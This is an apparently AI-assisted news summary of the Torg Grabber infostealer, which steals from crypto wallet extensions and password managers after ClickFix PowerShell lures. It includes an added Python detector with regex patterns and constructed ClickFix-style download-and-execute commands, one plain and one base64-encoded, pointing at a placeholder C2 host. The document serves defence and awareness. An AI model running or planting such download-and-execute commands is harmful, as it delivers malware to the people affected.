Malware & Ransomware · HIGH

Torg Grabber - New Infostealer Targets 728 Crypto Wallets

BleepingComputer · Reporting by Bill Toulas
Summary by CyberPings Editorial · AI-assisted · Reviewed by Rohit Rana

In short: Torg Grabber is a new infostealer that steals data from hundreds of cryptocurrency wallet browser extensions.

Quick Summary

Torg Grabber is an infostealer that harvests sensitive data from over 700 cryptocurrency wallet browser extensions. This poses a significant risk to users' financial security. Stay informed and protect your assets.

What Happened

A new infostealer malware named Torg Grabber has emerged, targeting sensitive data from 850 browser extensions, with a staggering 728 of these extensions dedicated to cryptocurrency wallets. The malware gains initial access using a technique called ClickFix, which hijacks the clipboard and tricks users into executing a malicious PowerShell command. Researchers from Gen Digital report that Torg Grabber is actively developed, with 334 unique samples compiled in just three months, indicating a rapid evolution in its capabilities.

The malware's development has seen a shift in its communication methods. Initially, it used a Telegram-based system for data exfiltration, but this was replaced with an HTTPS connection routed through Cloudflare infrastructure. This change allows for chunked data uploads and payload delivery, enhancing its stealth and effectiveness.

Who's Being Targeted

Torg Grabber is particularly dangerous for cryptocurrency users. It targets 25 Chromium-based browsers and 8 Firefox variants, attempting to steal credentials, cookies, and autofill data. Some of the most popular wallets targeted include MetaMask, TrustWallet, and Coinbase. The malware's reach extends to 103 password managers and various other applications, including Discord, Telegram, and Steam.

The sheer number of extensions affected means that many users may not even be aware that their wallets are at risk. The malware's ability to infiltrate a wide array of applications makes it a significant threat to anyone involved in cryptocurrency transactions.

Signs of Infection

Users should be vigilant for signs of infection by Torg Grabber. The malware can build a hardware fingerprint of the host, take screenshots, and even execute shellcode on compromised devices. It also inventories installed software, including antivirus tools, which points to deliberate evasion of security products. If you notice unusual activity in your cryptocurrency wallets or password managers, it may be a sign that Torg Grabber is present.
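Because the initial access described above is a pasted PowerShell command, the most reliable early sign of infection is the command itself showing up in process-creation or script-block telemetry. The following Python is an added example, not code from the original article, BleepingComputer or Gen Digital: it scans command lines for the traits a ClickFix-style paste typically carries (hidden window, execution-policy bypass, encoded payload, download-then-execute chain) and unpacks an -EncodedCommand payload so the hidden chain is visible. The log lines, URLs and payload are constructed for the example, and the indicator names and the two-indicator alert threshold are assumptions of mine.

```python
"""Detection helper for ClickFix-style PowerShell launches (added example).

Scans PowerShell command lines, as found in process-creation or script-block
logs, for traits a pasted ClickFix command usually carries. Every sample
line, URL and payload below is constructed for this example; none is a real
indicator of compromise.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Assumed indicator set: each regex catches one trait of a pasted command.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "encoded_command": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I),
    # download-then-execute in either order: iex (iwr ...)  or  iwr ... | iex
    "download_exec": re.compile(
        r"(?:iex|invoke-expression)\b.*\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)"
        r"|(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b.*\|\s*(?:iex|invoke-expression)\b",
        re.I,
    ),
}


def decode_encoded_command(b64: str) -> Optional[str]:
    """-EncodedCommand carries UTF-16LE text; return it, or None if not valid base64."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-16-le", errors="replace")


@dataclass
class Finding:
    line: str
    indicators: List[str] = field(default_factory=list)
    decoded: Optional[str] = None

    @property
    def suspicious(self) -> bool:
        # A single trait (e.g. a legitimately encoded admin script) is noisy;
        # the assumed threshold is two independent traits on one command.
        return len(self.indicators) >= 2


def analyze_line(line: str) -> Finding:
    """Return the indicators matched by one command line, re-scanning any decoded payload."""
    finding = Finding(line=line)
    for name, pattern in INDICATORS.items():
        match = pattern.search(line)
        if not match:
            continue
        finding.indicators.append(name)
        if name == "encoded_command":
            decoded = decode_encoded_command(match.group(1))
            if decoded is not None:
                finding.decoded = decoded
                # The base64 layer is what hides the download-and-run chain,
                # so the decoded text is checked against the same indicators.
                for inner, inner_pattern in INDICATORS.items():
                    if inner != "encoded_command" and inner not in finding.indicators \
                            and inner_pattern.search(decoded):
                        finding.indicators.append(inner)
    return finding


def scan(lines: List[str]) -> List[Finding]:
    """Return only the findings that cross the alert threshold."""
    return [f for f in (analyze_line(l) for l in lines) if f.suspicious]


# Constructed sample command lines (not real telemetry).
BENIGN_LINE = 'powershell.exe -NoProfile -Command "Get-ChildItem C:\\Temp"'
CLICKFIX_PLAIN = (
    "powershell.exe -w hidden -ep bypass -c "
    "\"iex (iwr 'https://c2.example.invalid/verify')\""
)
# Hypothetical payload wrapped the way PowerShell expects for -enc (UTF-16LE, base64).
HIDDEN_PAYLOAD = "iwr 'https://c2.example.invalid/p' | iex"
CLICKFIX_ENCODED = "powershell.exe -w hidden -enc " + base64.b64encode(
    HIDDEN_PAYLOAD.encode("utf-16-le")).decode()

if __name__ == "__main__":
    for finding in scan([BENIGN_LINE, CLICKFIX_PLAIN, CLICKFIX_ENCODED]):
        print("ALERT", finding.indicators, "->", finding.decoded or finding.line)
```

Run against a real export of PowerShell command lines, the threshold keeps routine encoded scripts from alerting on their own, while the decoded payload gives an analyst the actual download-and-run chain to triage.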

How to Protect Yourself

To safeguard against Torg Grabber, users should take proactive measures:

  • Update your software regularly to patch vulnerabilities.
  • Use multi-factor authentication for your cryptocurrency wallets and sensitive accounts.
  • Monitor your accounts for unauthorized transactions or changes.
  • Educate yourself about phishing techniques to avoid falling victim to ClickFix or similar methods.

Staying informed and vigilant is key to protecting your digital assets from evolving threats like Torg Grabber.

🔒 Pro insight: Torg Grabber's rapid development and extensive targeting reflect a growing trend in malware sophistication, particularly in the cryptocurrency sector.

Original article from BleepingComputer (Bill Toulas).

Also covered by Cyber Security News: "New Torg Grabber Stealer Moves From Telegram Exfiltration to Encrypted REST API C2".
